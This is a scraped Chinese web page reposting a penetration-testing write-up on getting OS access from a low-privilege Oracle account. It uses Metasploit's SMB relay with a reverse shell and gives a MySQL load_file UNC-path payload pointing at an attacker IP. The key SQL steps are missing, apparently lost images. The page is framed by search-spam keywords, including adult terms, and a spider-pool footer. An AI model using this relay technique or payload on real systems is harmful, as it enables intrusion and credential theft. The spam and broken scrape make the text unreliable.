婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > Oracle 低權限數據庫賬戶得到 OS 訪問權限 提權利用

Oracle 低權限數據庫賬戶得到 OS 訪問權限 提權利用

熱門標簽:沈陽400電話是如何辦理 地圖標注付款了怎么找不到了 北京營銷外呼系統廠家 北京外呼系統公司排名 外呼系統口號 貴陽智能電銷機器人官網 百度地圖標注員是干什么 溫州人工外呼系統 外呼系統鄭州

這幾天看了篇叫"Penetration: from application down to OS (Oracle)"的文檔,感覺挺有意思的,文檔的 大概意思就是說,如果 ORACLE 服務是用 administrator 賬戶啟動的,你只要有一個具有 resource 和 connect 權限的數據庫賬戶,就能利用 metasploit 的 smbrelay 功能,本地搭建一個 SMB 欺騙服務器, 來得到系統的訪問權限。我本地測試了下,還真的成功了。:-)

具體的原理分析看原文吧,我這里把我的測試過程寫出來.

我的滲透環境用的是 ubuntu8.10+metasploit 3.3 dev,oracle 數據庫版本為 10.2.0.1.0,服務啟動權限為 administrator,數據庫賬戶用的是 dbsnmp 賬戶的默認權限.0

1.先用 netstat 命令查看一下,本地的 139 端口有沒有占用,一般占用此端口的服務就是 Samba 了,要關掉。ubuntu 的關閉方法是 sudo /etc/init.d/samba stopp>1

2.運行 metasploit,我選用的 PAYLOAD 是 shell_reverse_tcp,做好相應配置后,exploit.就能用 netstat 看到本地已經監聽了 139 和 8522 端口了.

2

3

3.我現在使用 dbsnmp 默認賬戶連接到 oracle 數據庫上,這個賬戶默認權限是比較低的,只有 connect和 resource 權限。

4.然后執行下面 3 條 SQL 語句

 

5

6

7

后來經過 pt007 的提醒,我又測試了 mysql,如果服務也是 administrator 啟動的,用select load_file('\\\\192.168.1.52\mk.txt')也是可以得到系統權限的.MSSQL 應該用 xp_dirtree 存儲過程 也是可以的,不過我沒有配置出來用 administrator 賬戶啟動 MSSQL 服務,希望知道的朋友指點下我。

這個技術可以用到內網 WEB 評估的時候,如果有注入,服務又是 administrator 啟動的,可以提權了。

兩個PDF下載,

作者:Mickey
http://dsecrg.com/files/pub/pdf/Penetration_from_application_down_to_OS_(Oracle%20database).pdf
http://54mickey.googlepages.com/Penetration_fromapplication_down_to_.pdf

當執行完 create index 這句的時候,在看咱們本地的 metasploit,就已經得到 ORACLE 數據庫主機的系 統當前服務用戶的 half lm 哈希和 cmdshell 了。

您可能感興趣的文章:
  • Javascript中的幾種繼承方式對比分析
  • 淺析2種JavaScript繼承方式
  • Javascript編程中幾種繼承方式比較分析
  • JavaScript中的繼承方式詳解
  • javascript學習筆記(九)javascript中的原型(prototype)及原型鏈的繼承方式
  • JavaScript繼承方式實例
  • Linux下SVN服務器同時支持Apache的http和svnserve獨立服務器兩種模式且使用相同的訪問權限賬號
  • 深入解析yii權限分級式訪問控制的實現(非RBAC法)
  • Oracle 10g各個帳號的訪問權限、登錄路徑、監控狀態命令查詢等等
  • 127.0.0.1無法訪問,沒有權限: GetObject
  • 使用Cacls命令設置服務器文件訪問權限
  • C++ 的三種訪問權限與三種繼承方式

標簽:定西 包頭 淮北 衢州 潮州 衡水 通遼 溫州

巨人網絡通訊聲明:本文標題《Oracle 低權限數據庫賬戶得到 OS 訪問權限 提權利用》,本文關鍵詞  Oracle,低,權限,數據庫,賬戶,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《Oracle 低權限數據庫賬戶得到 OS 訪問權限 提權利用》相關的同類信息!
  • 本頁收集關于Oracle 低權限數據庫賬戶得到 OS 訪問權限 提權利用的相關信息資訊供網民參考!
  • 推薦文章
    主站蜘蛛池模板: 绥德县| 茌平县| 洛阳市| 海丰县| 平定县| 安多县| 屏东市| 天峻县| 铅山县| 焦作市| 唐海县| 扶风县| 若尔盖县| 龙川县| 黑龙江省| 德清县| 根河市| 托克逊县| 金阳县| 喜德县| 霍山县| 泸溪县| 东乡县| 平凉市| 襄汾县| 彭州市| 右玉县| 积石山| 台北县| 顺平县| 商城县| 宁波市| 黄梅县| 唐河县| 胶州市| 东光县| 柳江县| 鄂伦春自治旗| 定边县| 波密县| 凤阳县|